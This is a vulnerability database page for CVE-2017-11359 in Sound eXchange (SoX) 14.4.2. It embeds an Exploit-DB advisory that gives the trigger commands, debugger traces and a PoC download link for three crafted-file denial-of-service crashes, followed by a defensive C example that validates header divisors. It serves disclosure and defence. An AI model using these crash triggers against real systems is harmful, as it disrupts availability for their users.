CVE-2017-11359 : Detail

CVE-2017-11359

CVSS v3 score: 5.5 / Medium
EPSS: 0.44%
Attack vector: Local
Published: 2017-07-31 11h00 +00:00
Last modified: 2019-03-06 09h57 +00:00

CVE Descriptions

The wavwritehdr function in wav.c in Sound eXchange (SoX) 14.4.2 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted snd file, during conversion to a wav file.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE-369 Divide By Zero
The product divides a value by zero.

Metrics

Metrics Score Severity CVSS Vector Source
V3.0 5.5 MEDIUM CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Base: Exploitability Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

A vulnerability exploitable with Local access means that the vulnerable component is not bound to the network stack, and the attacker's path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file.

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success against the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

Required

Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Unchanged

An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

None

There is no loss of confidentiality within the impacted component.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

None

There is no loss of integrity within the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks only a small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

(no environmental metrics are listed for this CVE)

Metrics table, continued: the V3.0 row above is sourced from [email protected]; a second row gives the CVSS v2 score:
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 42398

Publication date : 2017-07-30 22h00 +00:00
Author : qflb.wu
EDB Verified : No

Sound eXchange (SoX) multiple vulnerabilities
================

Author : qflb.wu
===============

Introduction:
=============
SoX is a cross-platform (Windows, Linux, MacOS X, etc.) command line utility that can convert various formats of computer audio files into other formats. It can also apply various effects to these sound files, and, as an added bonus, SoX can play and record audio files on most platforms.

Affected version:
=====
14.4.2

Vulnerability Description:
==========================

1. the startread function in wav.c in Sound eXchange (SoX) 14.4.2 can cause a denial of service (divide-by-zero error and application crash) via a crafted wav file.

./sox sox_14.4.2_divide_by_zero_error_1.wav out.ogg

----debug info:----
Program received signal SIGFPE, Arithmetic exception.
0x00007ffff7b9c829 in startread (ft=0x611540) at wav.c:950
950         wav->numSamples = div_bits(qwDataLength, ft->encoding.bits_per_sample) / ft->signal.channels;
(gdb) disassemble 0x00007ffff7b9c829,0x00007ffff7b9c8ff
Dump of assembler code from 0x7ffff7b9c829 to 0x7ffff7b9c8ff:
=> 0x00007ffff7b9c829 <startread+1577>: div    %rcx
   0x00007ffff7b9c82c <startread+1580>: mov    %rax,0x0(%rbp)
   0x00007ffff7b9c830 <startread+1584>: imul   %rcx,%rax
   0x00007ffff7b9c834 <startread+1588>: mov    %rax,0x18(%rbx)
   0x00007ffff7b9c838 <startread+1592>: mov    0x28(%rbp),%r8d
   0x00007ffff7b9c83c <startread+1596>: test   %r8d,%r8d
   0x00007ffff7b9c83f <startread+1599>: je     0x7ffff7b9c849 <startread+1609>
   0x00007ffff7b9c841 <startread+1601>: movq   $0x0,0x18(%rbx)
   0x00007ffff7b9c849 <startread+1609>: mov    %r9d,0x14(%rsp)
   0x00007ffff7b9c84e <startread+1614>: mov    %edi,0x10(%rsp)
   0x00007ffff7b9c852 <startread+1618>: callq  0x7ffff7b50390 <sox_get_globals@plt>
   0x00007ffff7b9c857 <startread+1623>: cmpw   $0x1,0x22(%rsp)
   0x00007ffff7b9c85d <startread+1629>: lea    0x241fa(%rip),%rdx        # 0x7ffff7bc0a5e
   0x00007ffff7b9c864 <startread+1636>: mov    0x10(%rsp),%edi
   0x00007ffff7b9c868 <startread+1640>: mov    0x30(%rsp),%r8d
   0x00007ffff7b9c86d <startread+1645>: lea    0x1de3a(%rip),%rcx        # 0x7ffff7bba6ae
   0x00007ffff7b9c874 <startread+1652>: mov    %rdx,0x40(%rax)
   0x00007ffff7b9c878 <startread+1656>: lea    0x115e7(%rip),%rax        # 0x7ffff7bade66
---Type <return> to continue, or q <return> to quit---q
End of assembler dump.
(gdb) i r
rax            0x537    1335
rbx            0x611540 6362432
rcx            0x0      0
rdx            0x0      0
rsi            0x8      8
rdi            0x1      1
rbp            0x611a60 0x611a60
rsp            0x7fffffffdc00 0x7fffffffdc00
r8             0x7ffff7fce7c0 140737353934784
r9             0x0      0
r10            0x7fffffffd9c0 140737488345536
r11            0x7ffff72cca80 140737340295808
r12            0x537    1335
r13            0x7fffffffdc50 140737488346192
r14            0x7fffffffdc40 140737488346176
r15            0x0      0
rip            0x7ffff7b9c829 0x7ffff7b9c829 <startread+1577>
eflags         0x10246  [ PF ZF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb)

POC:
sox_14.4.2_divide_by_zero_error_1.wav

CVE:
CVE-2017-11332

2. the read_samples function in hcom.c in Sound eXchange (SoX) 14.4.2 can cause a denial of service (invalid memory read and application crash) via a crafted hcom file.

./sox sox_14.4.2_invalid_memory_read.hcom out.wav

----debug info:----
Program received signal SIGSEGV, Segmentation fault.
read_samples (ft=0x611590, buf=0x61460c, len=8185) at hcom.c:215
215         if(p->dictionary[p->dictentry].dict_leftson < 0) {
(gdb) bt
#0  read_samples (ft=0x611590, buf=0x61460c, len=8185) at hcom.c:215
#1  0x00007ffff7b58409 in sox_read (ft=ft@entry=0x611590, buf=<optimized out>, len=8192) at formats.c:978
#2  0x0000000000409dd4 in sox_read_wide (ft=0x611590, buf=<optimized out>, max=<optimized out>) at sox.c:490
#3  0x000000000040a32e in combiner_drain (effp=0x614410, obuf=0x6145f0, osamp=0x7fffffffdbb0) at sox.c:552
#4  0x00007ffff7b68c0d in drain_effect (n=0, chain=0x614260) at effects.c:352
#5  sox_flow_effects (chain=0x614260, callback=callback@entry=0x405a80 <update_status>, client_data=client_data@entry=0x0) at effects.c:445
#6  0x0000000000407bf6 in process () at sox.c:1802
#7  0x0000000000403085 in main (argc=3, argv=0x7fffffffdf98) at sox.c:3008
(gdb) disassemble
Dump of assembler code for function read_samples:
   0x00007ffff7b93900 <+0>:   push   %r15
   0x00007ffff7b93902 <+2>:   push   %r14
   0x00007ffff7b93904 <+4>:   mov    %rsi,%r14
   0x00007ffff7b93907 <+7>:   push   %r13
   0x00007ffff7b93909 <+9>:   push   %r12
   0x00007ffff7b9390b <+11>:  push   %rbp
   0x00007ffff7b9390c <+12>:  push   %rbx
   0x00007ffff7b9390d <+13>:  mov    %rdi,%rbx
   0x00007ffff7b93910 <+16>:  sub    $0x28,%rsp
   0x00007ffff7b93914 <+20>:  mov    0x2d0(%rdi),%r15
   0x00007ffff7b9391b <+27>:  mov    0x24(%r15),%esi
   0x00007ffff7b9391f <+31>:  test   %esi,%esi
   0x00007ffff7b93921 <+33>:  js     0x7ffff7b93a60 <read_samples+352>
   0x00007ffff7b93927 <+39>:  mov    0x10(%r15),%rdi
   0x00007ffff7b9392b <+43>:  xor    %eax,%eax
   0x00007ffff7b9392d <+45>:  lea    (%rax,%rdx,1),%r13d
   0x00007ffff7b93931 <+49>:  lea    0x28(%r15),%rbp
   0x00007ffff7b93935 <+53>:  mov    %rdx,%r12
   0x00007ffff7b93938 <+56>:  lea    0x1(%r13),%eax
   0x00007ffff7b9393c <+60>:  mov    %eax,0xc(%rsp)
   0x00007ffff7b93940 <+64>:  mov    %r13d,%eax
   0x00007ffff7b93943 <+67>:  mov    %r12d,0x8(%rsp)
---Type <return> to continue, or q <return> to quit---
   0x00007ffff7b93948 <+72>:  sub    %r12d,%eax
   0x00007ffff7b9394b <+75>:  mov    %eax,(%rsp)
   0x00007ffff7b9394e <+78>:  jmp    0x7ffff7b93989 <read_samples+137>
   0x00007ffff7b93950 <+80>:  lea    -0x1(%rax),%r8d
   0x00007ffff7b93954 <+84>:  movslq 0x20(%r15),%rax
   0x00007ffff7b93958 <+88>:  mov    0x28(%r15),%edx
   0x00007ffff7b9395c <+92>:  mov    (%r15),%rsi
   0x00007ffff7b9395f <+95>:  shl    $0x4,%rax
   0x00007ffff7b93963 <+99>:  test   %edx,%edx
   0x00007ffff7b93965 <+101>: js     0x7ffff7b939e0 <read_samples+224>
   0x00007ffff7b93967 <+103>: movswq 0x8(%rsi,%rax,1),%rax
   0x00007ffff7b9396d <+109>: mov    %eax,0x20(%r15)
   0x00007ffff7b93971 <+113>: shl    $0x4,%rax
   0x00007ffff7b93975 <+117>: add    %edx,%edx
   0x00007ffff7b93977 <+119>: mov    %r8d,0x24(%r15)
   0x00007ffff7b9397b <+123>: add    %rsi,%rax
   0x00007ffff7b9397e <+126>: mov    %edx,0x28(%r15)
=> 0x00007ffff7b93982 <+130>: cmpw   $0x0,0x8(%rax)
   0x00007ffff7b93987 <+135>: js     0x7ffff7b939f0 <read_samples+240>
   0x00007ffff7b93989 <+137>: test   %rdi,%rdi
   0x00007ffff7b9398c <+140>: jle    0x7ffff7b93a48 <read_samples+328>
   0x00007ffff7b93992 <+146>: mov    0x24(%r15),%eax
   0x00007ffff7b93996 <+150>: test   %eax,%eax
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) i r
rax            0x631b30 6495024
rbx            0x611590 6362512
rcx            0x1      1
rdx            0x690000 6881280
rsi            0x611b20 6363936
rdi            0x524    1316
rbp            0x611ad8 0x611ad8
rsp            0x7fffffffda30 0x7fffffffda30
r8             0x10     16
r9             0x7ffff7fce7c0 140737353934784
r10            0x7fffffffd7f0 140737488345072
r11            0x7ffff72cb2e0 140737340289760
r12            0x1ff9   8185
r13            0x2000   8192
r14            0x61460c 6374924
r15            0x611ab0 6363824
rip            0x7ffff7b93982 0x7ffff7b93982 <read_samples+130>
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/20x $rax+8
0x631b38:       Cannot access memory at address 0x631b38
(gdb)

POC:
sox_14.4.2_invalid_memory_read.hcom

CVE:
CVE-2017-11358

3. the wavwritehdr function in wav.c in Sound eXchange (SoX) 14.4.2 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted snd file which is converted to a wav file.

./sox sox_14.4.2_divide_by_zero_error_2.snd out.wav

----debug info:----
Program received signal SIGFPE, Arithmetic exception.
0x00007ffff7b9a97b in wavwritehdr (ft=ft@entry=0x611bf0, second_header=second_header@entry=0) at wav.c:1457
1457            blocksWritten = MS_UNSPEC/wBlockAlign;
(gdb) bt
#0  0x00007ffff7b9a97b in wavwritehdr (ft=ft@entry=0x611bf0, second_header=second_header@entry=0) at wav.c:1457
#1  0x00007ffff7b9c0e9 in startwrite (ft=0x611bf0) at wav.c:1252
#2  0x00007ffff7b59e32 in open_write (path=path@entry=0x611bc0 "/home/a/Documents/out.wav", buffer=buffer@entry=0x0, buffer_size=buffer_size@entry=0, buffer_ptr=buffer_ptr@entry=0x0, buffer_size_ptr=buffer_size_ptr@entry=0x0, signal=signal@entry=0x611410, encoding=encoding@entry=0x611430, filetype=0x611bd6 "wav", oob=oob@entry=0x7fffffffdcd0, overwrite_permitted=overwrite_permitted@entry=0x409ce0 <overwrite_permitted>) at formats.c:912
#3  0x00007ffff7b5a5e8 in sox_open_write (path=path@entry=0x611bc0 "/home/a/Documents/out.wav", signal=signal@entry=0x611410, encoding=encoding@entry=0x611430, filetype=<optimized out>, oob=oob@entry=0x7fffffffdcd0, overwrite_permitted=overwrite_permitted@entry=0x409ce0 <overwrite_permitted>) at formats.c:948
#4  0x000000000040847a in open_output_file () at sox.c:1557
#5  process () at sox.c:1754
#6  0x0000000000403085 in main (argc=3, argv=0x7fffffffdfa8) at sox.c:3008
(gdb) disassemble 0x00007ffff7b9a97b,0x00007ffff7b9a9ff
Dump of assembler code from 0x7ffff7b9a97b to 0x7ffff7b9a9ff:
=> 0x00007ffff7b9a97b <wavwritehdr+427>: idivl  0x10(%rsp)
   0x00007ffff7b9a97f <wavwritehdr+431>: movslq %eax,%rcx
   0x00007ffff7b9a982 <wavwritehdr+434>: imul   %eax,%r12d
   0x00007ffff7b9a986 <wavwritehdr+438>: mov    %rcx,0x48(%rsp)
   0x00007ffff7b9a98b <wavwritehdr+443>: imul   %r14d,%eax
   0x00007ffff7b9a98f <wavwritehdr+447>: cmp    $0x31,%bp
   0x00007ffff7b9a993 <wavwritehdr+451>: mov    %eax,0x40(%rsp)
   0x00007ffff7b9a997 <wavwritehdr+455>: je     0x7ffff7b9aff0 <wavwritehdr+2080>
   0x00007ffff7b9a99d <wavwritehdr+461>: cmp    $0x1,%bp
   0x00007ffff7b9a9a1 <wavwritehdr+465>: je     0x7ffff7b9b0a8 <wavwritehdr+2264>
   0x00007ffff7b9a9a7 <wavwritehdr+471>: movzwl 0x3e(%rsp),%eax
   0x00007ffff7b9a9ac <wavwritehdr+476>: movl   $0x0,0x34(%rsp)
   0x00007ffff7b9a9b4 <wavwritehdr+484>: lea    0x12(%rax),%r13d
   0x00007ffff7b9a9b8 <wavwritehdr+488>: mov    %r12d,%eax
   0x00007ffff7b9a9bb <wavwritehdr+491>: and    $0x1,%eax
   0x00007ffff7b9a9be <wavwritehdr+494>: movzwl %r13w,%r13d
   0x00007ffff7b9a9c2 <wavwritehdr+498>: lea    (%r12,%r13,1),%edx
   0x00007ffff7b9a9c6 <wavwritehdr+502>: add    %edx,%eax
   0x00007ffff7b9a9c8 <wavwritehdr+504>: cmp    $0x1,%bp
   0x00007ffff7b9a9cc <wavwritehdr+508>: setne  0x3d(%rsp)
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/10gx $rsp+10
0x7fffffffdaaa: 0x0000000000000000      0x0056000000000000
0x7fffffffdaba: 0x00010000000000d4      0x0001000000000000
0x7fffffffdaca: 0x0000000000080000      0x0000000000000008
0x7fffffffdada: 0x0fe000007fff0000      0x876000007ffff7bc
0x7fffffffdaea: 0x00d000007ffff761      0x21a0000000000000
(gdb)

POC:
sox_14.4.2_divide_by_zero_error_2.snd

CVE:
CVE-2017-11359

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42398.zip
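The two SIGFPE crashes in the advisory (CVE-2017-11332 at wav.c:950, CVE-2017-11359 at wav.c:1457) share one root cause under CWE-369: a divisor derived from untrusted header fields (channel count, bits per sample, block align) reaches an integer division without being checked for zero. The following is an added example, not SoX's code and not the upstream fix, showing the defensive pattern: validate every header-derived divisor before any division, and cross-check the declared block align against the value recomputed from channels and bit depth so a crafted fmt chunk is rejected with an error instead of a crash. It goes slightly beyond the advisory by also parsing the 16-byte PCM fmt chunk layout. The names derive_wav_fields, parse_fmt_chunk, the status enum and the LEN_UNSPEC sentinel (standing in for the MS_UNSPEC constant named in the crash line, whose real value is not reproduced) are assumptions; the fmt chunk bytes are constructed for the example and are not taken from the PoC files.

```c
/* Defensive derivation of WAV header fields: every divisor that comes from
 * the input file is validated before it is used.  Added example; this is not
 * SoX code and not the upstream fix for CVE-2017-11332 / CVE-2017-11359. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

enum wav_hdr_status {
    WAV_HDR_OK = 0,
    WAV_HDR_TOO_SHORT,            /* fmt chunk shorter than the 16 PCM bytes */
    WAV_HDR_BAD_CHANNELS,         /* nChannels == 0 would zero a divisor */
    WAV_HDR_BAD_BITS,             /* wBitsPerSample == 0 or not a whole byte */
    WAV_HDR_BAD_BLOCK_ALIGN,      /* computed block align is 0 or too large */
    WAV_HDR_BLOCK_ALIGN_MISMATCH  /* declared nBlockAlign disagrees with computed */
};

struct wav_hdr_fields {
    unsigned channels;
    unsigned bits_per_sample;
    uint32_t block_align;    /* channels * bytes per sample */
    uint64_t num_samples;    /* per channel, from the data length */
    uint32_t blocks_written; /* block count used for an unknown-length stream */
};

/* Assumed sentinel for "length not yet known"; SoX's MS_UNSPEC plays this
 * role in the advisory's crash line, but its exact value is not reproduced. */
#define LEN_UNSPEC 0x7ffff000u

static unsigned le16(const uint8_t *p) { return (unsigned)p[0] | ((unsigned)p[1] << 8); }

/* Validate, then derive; returns before dividing if any divisor would be 0. */
enum wav_hdr_status derive_wav_fields(unsigned channels, unsigned bits_per_sample,
                                      uint64_t data_bytes, struct wav_hdr_fields *out)
{
    if (channels == 0) return WAV_HDR_BAD_CHANNELS;
    if (bits_per_sample == 0 || bits_per_sample % 8 != 0) return WAV_HDR_BAD_BITS;
    uint64_t block_align = (uint64_t)channels * (bits_per_sample / 8);
    if (block_align == 0 || block_align > 0xFFFFu) return WAV_HDR_BAD_BLOCK_ALIGN;
    out->channels = channels;
    out->bits_per_sample = bits_per_sample;
    out->block_align = (uint32_t)block_align;
    out->num_samples = data_bytes / block_align;                /* startread-style division, now guarded */
    out->blocks_written = (uint32_t)(LEN_UNSPEC / block_align); /* wavwritehdr-style division, now guarded */
    return WAV_HDR_OK;
}

/* Parse a PCM "fmt " chunk body (16 bytes, little-endian) and cross-check the
 * declared nBlockAlign against the value derived from channels and bit depth. */
enum wav_hdr_status parse_fmt_chunk(const uint8_t *fmt, size_t len,
                                    uint64_t data_bytes, struct wav_hdr_fields *out)
{
    if (len < 16) return WAV_HDR_TOO_SHORT;
    unsigned channels = le16(fmt + 2);             /* nChannels      @ offset 2  */
    unsigned declared_block_align = le16(fmt + 12); /* nBlockAlign    @ offset 12 */
    unsigned bits = le16(fmt + 14);                 /* wBitsPerSample @ offset 14 */
    enum wav_hdr_status st = derive_wav_fields(channels, bits, data_bytes, out);
    if (st != WAV_HDR_OK) return st;
    if (declared_block_align != out->block_align) return WAV_HDR_BLOCK_ALIGN_MISMATCH;
    return WAV_HDR_OK;
}

/* Constructed sample fmt chunks (not taken from the advisory's PoC files). */
static const uint8_t GOOD_FMT[16] = {
    0x01, 0x00,             /* wFormatTag = 1 (PCM) */
    0x02, 0x00,             /* nChannels = 2 */
    0x44, 0xAC, 0x00, 0x00, /* nSamplesPerSec = 44100 */
    0x10, 0xB1, 0x02, 0x00, /* nAvgBytesPerSec = 176400 */
    0x04, 0x00,             /* nBlockAlign = 4 */
    0x10, 0x00              /* wBitsPerSample = 16 */
};
static const uint8_t ZERO_CHANNELS_FMT[16] = { /* nChannels = 0 */
    0x01, 0x00, 0x00, 0x00, 0x44, 0xAC, 0x00, 0x00,
    0x10, 0xB1, 0x02, 0x00, 0x00, 0x00, 0x10, 0x00
};
static const uint8_t ZERO_ALIGN_FMT[16] = { /* 1 channel, 8 bits, but nBlockAlign = 0 */
    0x01, 0x00, 0x01, 0x00, 0x44, 0xAC, 0x00, 0x00,
    0x44, 0xAC, 0x00, 0x00, 0x00, 0x00, 0x08, 0x00
};

int main(void)
{
    struct wav_hdr_fields f;
    enum wav_hdr_status st = parse_fmt_chunk(GOOD_FMT, sizeof GOOD_FMT, 1000, &f);
    printf("good: status %d, block_align %u, num_samples %llu, blocks_written %u\n",
           (int)st, f.block_align, (unsigned long long)f.num_samples, f.blocks_written);
    printf("zero channels: status %d\n", (int)parse_fmt_chunk(ZERO_CHANNELS_FMT, 16, 1000, &f));
    printf("zero block align: status %d\n", (int)parse_fmt_chunk(ZERO_ALIGN_FMT, 16, 1000, &f));
    return 0;
}
```

The point of the mismatch check is that a crafted file can keep channels and bit depth plausible while zeroing the one field a writer later divides by; recomputing block align from its inputs, rather than trusting the declared value, closes that path as well as the obvious zero-channel case.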

Products Mentioned

Configuration 0

Sound_exchange_project>>Sound_exchange >> Version 14.4.2

Configuration 0

Debian>>Debian_linux >> Version 7.0

Debian>>Debian_linux >> Version 8.0

References

https://www.exploit-db.com/exploits/42398/
Tags : exploit, x_refsource_EXPLOIT-DB
https://security.gentoo.org/glsa/201810-02
Tags : vendor-advisory, x_refsource_GENTOO